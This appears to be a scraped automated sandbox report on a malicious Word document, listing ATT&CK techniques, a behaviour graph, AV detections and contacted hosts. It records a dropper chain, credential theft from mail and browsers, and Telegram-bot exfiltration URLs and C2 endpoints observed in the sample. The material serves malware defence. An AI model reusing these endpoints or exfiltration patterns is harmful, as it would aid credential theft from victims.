                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                  Virtualization/Sandbox Evasion                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584675 Sample: ITT # KRPBV2663 .doc Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 53 reallyfreegeoip.org 2->53 55 api.telegram.org 2->55 57 4 other IPs or domains 2->57 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 85 23 other signatures 2->85 9 WINWORD.EXE 217 116 2->9         started        14 Aiymwhpj.PIF 2->14         started        16 Aiymwhpj.PIF 2->16         started        signatures3 81 Tries to detect the country of the analysis system (by using the IP) 53->81 83 Uses the Telegram API (likely for C&C communication) 55->83 process4 dnsIp5 61 147.124.216.113, 49710, 80 AC-AS-1US United States 9->61 51 C:\Windows\SysWOW64\brightness.exe, PE32 9->51 dropped 99 Document exploit detected (creates forbidden files) 9->99 101 Drops executables to the windows directory (C:\Windows) and starts them 9->101 103 Office process queries suspicious COM object (likely to drop second stage) 9->103 18 brightness.exe 1 10 9->18         started        105 Multi AV Scanner detection for dropped file 14->105 107 Writes to foreign memory regions 14->107 109 Allocates memory in foreign processes 14->109 23 jphwmyiA.pif 14->23         started        25 cmd.exe 14->25         started        111 Sample uses process hollowing technique 16->111 113 Sample is not signed and drops a device driver 16->113 27 jphwmyiA.pif 16->27         started        29 cmd.exe 16->29         started        file6 signatures7 process8 dnsIp9 59 amazonenviro.com 166.62.27.188, 49712, 49713, 80 AS-26496-GO-DADDY-COM-LLCUS United States 18->59 43 C:\Users\Public\Libraries\jphwmyiA.pif, PE32 18->43 dropped 45 C:\Users\Public\Libraries\Aiymwhpj.PIF, PE32 18->45 dropped 47 C:\Users\Public\Libraries\FX.cmd, DOS 18->47 dropped 49 2 other malicious files 18->49 dropped 87 Multi AV Scanner detection for dropped file 18->87 89 Drops PE files with a suspicious file extension 18->89 91 Writes to foreign memory regions 18->91 97 4 other signatures 18->97 31 jphwmyiA.pif 15 2 18->31         started        35 cmd.exe 1 18->35         started        37 conhost.exe 25->37         started        93 Tries to steal Mail credentials (via file / registry access) 27->93 95 Tries to harvest and steal browser information (history, passwords, etc) 27->95 39 conhost.exe 29->39         started        file10 signatures11 process12 dnsIp13 63 mail.techniqueqatar.com 208.91.198.176, 53704, 53793, 53841 PUBLIC-DOMAIN-REGISTRYUS United States 31->63 65 checkip.dyndns.com 132.226.8.169, 49723, 49731, 49736 UTMEMUS United States 31->65 67 2 other IPs or domains 31->67 69 Detected unpacking (changes PE section rights) 31->69 71 Detected unpacking (overwrites its own PE header) 31->71 73 Tries to steal Mail credentials (via file / registry access) 31->73 41 conhost.exe 35->41         started        signatures14 process15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ITT # KRPBV2663 .doc47%ReversingLabsDocument-Word.Trojan.Leonem
                  ITT # KRPBV2663 .doc56%VirustotalBrowse
                  ITT # KRPBV2663 .doc100%AviraW97M/Agent.5915124
                  ITT # KRPBV2663 .doc100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\Aiymwhpj.PIF26%ReversingLabs
                  C:\Users\Public\Libraries\jphwmyiA.pif3%ReversingLabs
                  C:\Windows\SysWOW64\brightness.exe26%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://amazonenviro.com/0%Avira URL Cloudsafe
                  http://amazonenviro.com/245_Aiymwhpjxsg0%Avira URL Cloudsafe
                  http://amazonenviro.com:80/245_Aiymwhpjxsg0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.97.3
                  		truefalse
                    		high
                    mail.techniqueqatar.com
                    		208.91.198.176
                    		truetrue
                      		unknown
                      amazonenviro.com
                      		166.62.27.188
                      		truetrue
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          checkip.dyndns.com
                          		132.226.8.169
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                http://amazonenviro.com/245_Aiymwhpjxsgtrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high
                                    http://checkip.dyndns.org/false
                                      		high
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.office.com/jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/chrome_newtabjphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://sectigo.com/CPS0brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.orgjphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icojphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ocsp.sectigo.com0brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/botjphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://amazonenviro.com/brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://amazonenviro.com:80/245_Aiymwhpjxsgbrightness.exe, 00000007.00000002.2129746891.000000000071D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://checkip.dyndns.orgjphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enjphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.ecosia.org/newtab/jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://varders.kozow.com:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://aborters.duckdns.org:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ac.ecosia.org/autocomplete?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://51.38.247.67:8081/_send_.php?LjphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://anotherarmy.dns.army:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchjphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
